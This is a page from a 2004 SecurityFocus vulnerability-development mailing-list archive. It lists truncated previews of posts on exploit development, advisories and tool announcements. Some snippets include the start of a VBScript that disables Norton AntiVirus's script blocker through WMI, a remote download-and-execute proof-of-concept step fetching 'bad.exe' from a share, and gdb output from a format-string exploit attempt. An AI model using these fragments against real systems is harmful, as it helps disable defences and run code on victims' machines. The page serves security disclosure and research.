Vuln Dev Mode:
(Page 31 of 75)  < Prev  26 27 28 29 30 31 32 33 34 35 36  Next >
ISS BlackIce Server Protect Unprivileged User Attack 2004-08-11
Thomas Ryan (tommy providesecurity com) (1 replies)
Release Date:
August 11, 2004

Severity:
Medium

Vendor:
Internet Security Systems

Software:
BlackIce Server Protect 3.6cno and below

Remote:
Remotely Executable from Local and Trusted Networks

Vulnerabilities:
Unpriviledged User Attack

Technical Details:
Unpriviledged User Attack was originally

[ more ]  [ reply ]
Metasploit Framework v2.2 (with SDK) 2004-08-12
H D Moore (sflist digitaloffense net)
The Metasploit Framework is an advanced open-source exploit development
platform. The 2.2 release includes three user interfaces, 30 exploits and
40 payloads. Additionally, this is the first public release to contain
the new in-memory DLL-injection system[1] and the VNC (remote desktop)
payload[2

[ more ]  [ reply ]
Re: CORE-2004-0705: Vulnerabilities in PuTTY and PSCP 2004-08-10
infamous41md hotpop com
anyone tried exploiting this yet? i foolishly assumed it wouldn't be that
difficult to exploit w/o modifying source for an ssl server. sniffed some
packets, got hexdumps of the packets, wrote a prog to pretend to be an ssl
server - which sent out the dumps of the packets i sniffed. only to then
r

[ more ]  [ reply ]
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-08-02
Arpa Net (arpa linuxmail org)

>
> So I get Bus error (core dumped) result. But in my opinion I should get shell.
> Somehow exploit is not working and I don't know the reason.
> I tried many times and no result.
> It seems like format string exploit in FreeBSD is different than Linux.

This exploit code use bash, in bsd root ma

[ more ]  [ reply ]
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-07-31
Vlad902 (vlad902 gmail com) (1 replies)
-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5: "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Br

[ more ]  [ reply ]
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-08-02
Ganbold (ganbold micom mng net)
Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-07-29
Ganbold (ganbold micom mng net) (1 replies)
Hi all,

I have sample format string exploit problem in FreeBSD 5.2-CURRENT.

$uname -an
FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58
ULAT 2004 tsgan@localhost:/usr/obj/usr/src/sys/MX i386

I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the
form

[ more ]  [ reply ]
Call for Open Source Privacy and Security Projects and Papers 2004-07-25
Pete Herzog (pete isecom org)
/ Call for Open Source Privacy and Security Projects and Papers /

Projects and papers for exhibition and forum accepted now for the 2nd
ISESTORM at the University of Nevada, Las Vegas, October 16 to 23.
Final deadline for registration is August 30th.

/ About the Forum /

The forum is a tribute t

[ more ]  [ reply ]
Announcing Pak Con 1st 2004-07-25
fz pakcon org

A N N O U N C I N G P A K C O N 1st
The Pakistan?s Hacking Convention

[ theme ]

We are proud to announce the 1st Pak Con Hacking Convention, the first
ever security and hacking seminar of its kind in Pakistan.

In an age where information is treasure and the treasure house is the
virtual netwo

[ more ]  [ reply ]
samba base64 encode vulnerability 2004-07-23
infamous41md hotpop com (1 replies)
a question about exploiting the samba vuln.

if (*s == '=') n -= 1;

/* fix up length */
decoded.length = n;

memcpy(s, decoded.data, decoded.length);

if n == 0 before it is decremented, then it will wrap around to ~0 and the memcpy will eventually SEGFAULT. but can you exploit it

[ more ]  [ reply ]
Re: samba base64 encode vulnerability 2004-07-24
Valdis Kletnieks vt edu (1 replies)
Re: samba base64 encode vulnerability 2004-07-24
infamous41md hotpop com
Inappropriate methods exposed in XML -what's the essence? 2004-07-20
portsmut navigator lv
Does somebody know what is essence of Microsoft Security Bulletin
MS02-052: what is so called "inappropriate methods exposed in XML
support classes" (CVE-CAN-2002-0865). Could anybody compile some POC
exploit showing this problem?

Regards,

Alex

--
Bezmaksas e-pasta adreses piedâvâ http://web

[ more ]  [ reply ]
Norton Anti Virus Script Blocker bypass using script(vb,js,...) II 2004-07-16
vozzie gmail com


what i forgot to say in previous post,...

if you start the script with killing Norton AV it's Script Blocker, then Script Blocker will not warn anymore when script is about to use 'dangerous' objects,...

' get wmi

set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"
)

[ more ]  [ reply ]
Norton Anti Virus Script Blocker bypass using script(vb,js,...) 2004-07-16
vozzie gmail com


DoS out NAV using WMI, used to work for the last years

i think it's not supposed to work this way

set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"
)

for each e in wmi.ExecQuery("Select * from Win32_Product")

on error resume next

if instr(e.name,"Script") and i

[ more ]  [ reply ]
Microsoft Window Utility Manager Local Elevation of Privileges 2004-07-13
Vivek Rathod (Application Security, Inc.) (vrathod appsecinc com)
Microsoft Window Utility Manager Local Elevation of Privileges

July 13, 2004

Credit: This vulnerability was researched and discovered by Cesar Cerrudo.

Risk Level: High

Summary: A local elevation of privileges exists in the Windows Utility
Manager which allows any user to take complete control

[ more ]  [ reply ]
FW: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-14
V. Poddubnyy (vpoddubniy mail ru)
Hi!

A little update: it was without changing your URL to point to the real
shdoclc.dll and under Normal user account. Under Administrator the disk was
renamed, under Normal user I don't have permission to rename disks.

So exploit works with those people who are browsing as administrators and
setup

[ more ]  [ reply ]
Unchecked buffer in mstask.dll 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= Unchecked buffer in mstask.dll
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
=
= Affected Software:
= Microsoft Windows 2000 Service Pack 4
= Microsoft Windows XP, Microsoft Windo

[ more ]  [ reply ]
HtmlHelp - .CHM File Heap Overflow 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= HtmlHelp - .CHM File Heap Overflow
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-023.mspx
=
= Affected Software:
= Microsoft Windows 98, 98SE, ME
= Microsoft Windows NT 4.0
= Microsoft Win

[ more ]  [ reply ]
IE Shell URI Download and Execute, POC 2004-07-14
Ferruh Mavituna (ferruh mavituna com)
Hello;

Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
Jelmer) message. I just added a new feature "download" and then execute
application. Also I use Wscript.Shell in Javascript instead of
Shell.Application.

1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
2- Wait fo

[ more ]  [ reply ]
phrack #62 has been released 2004-07-13
phrack staff (rm segfault net)
Hi,

Tue Jul 13 00:58:42 UTC - PHRACK #62 HAS BEEN RELEASED.

*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****

PHRACK MAGAZINE is one of the longest running electronic magazines

[ more ]  [ reply ]
Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-13
Bartosz Kwitkowski (bartosz wb pl) (1 replies)


details:

OS: Windows XP Prof (fully patched), IE 6.0

LANG: Polish (of course).

VULN:

1.this is zone-by-pass. Opening IE window is in My Computer zone.

You can paste script into this page and it will be executed as local.

I think this is very serious vuln.

2.site spoofing. You can cr

[ more ]  [ reply ]
RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-13
V. Poddubnyy (vpoddubniy mail ru)
White Paper: 0x00 vs ASP file upload scripts 2004-07-13
Brett Moore (brett moore security-assessment com)
We are proud to announce the release of our latest white paper
titled 0x00 vs ASP file upload scripts.

.Abstract.
The affects of the `Poison NULL byte` have not been widely
explored in ASP, but as with other languages the NULL byte
can cause problems when ASP passes data to objects.

Many upload sy

[ more ]  [ reply ]
Re: Norton AntiVirus Remote Denial Of Service Vulnerability [Part: !!!_update] 2004-07-12
Bipin Gautam (visitbipin hotmail com)
In-Reply-To: <20040710014540.25125.qmail (at) mail2.securityfocus (dot) com [email concealed]>

>From: "Dr PC Fix Security" <Security (at) drpcfix (dot) com [email concealed]>

<20040709123046.31037.qmail (at) www.securityfocus (dot) com [email concealed]>

>Thread-Index: AcRl7jNFH5UoKQz2TOO1HG/4w7tqiAAML3Pg

>

>

>Norton 2002, consumed about 20% cpu for 3 seconds until it found the

[ more ]  [ reply ]
DHCPing 0.90 2004-07-10
Gregory Duchemin (c3rb3r sympatico ca)
Hello,
DHCPing 0.90 (Unix) is available at http://dhcping.openwall.net.
It should be of a great help during your dhcp(d) security audits
providing a lot of options to create custom (in)valid dhcp/bootp traffic
a la Hping.
Also it features several exploits for the latest Isc Infoblox and Dlink
vul

[ more ]  [ reply ]
(Page 31 of 75)  < Prev  26 27 28 29 30 31 32 33 34 35 36  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus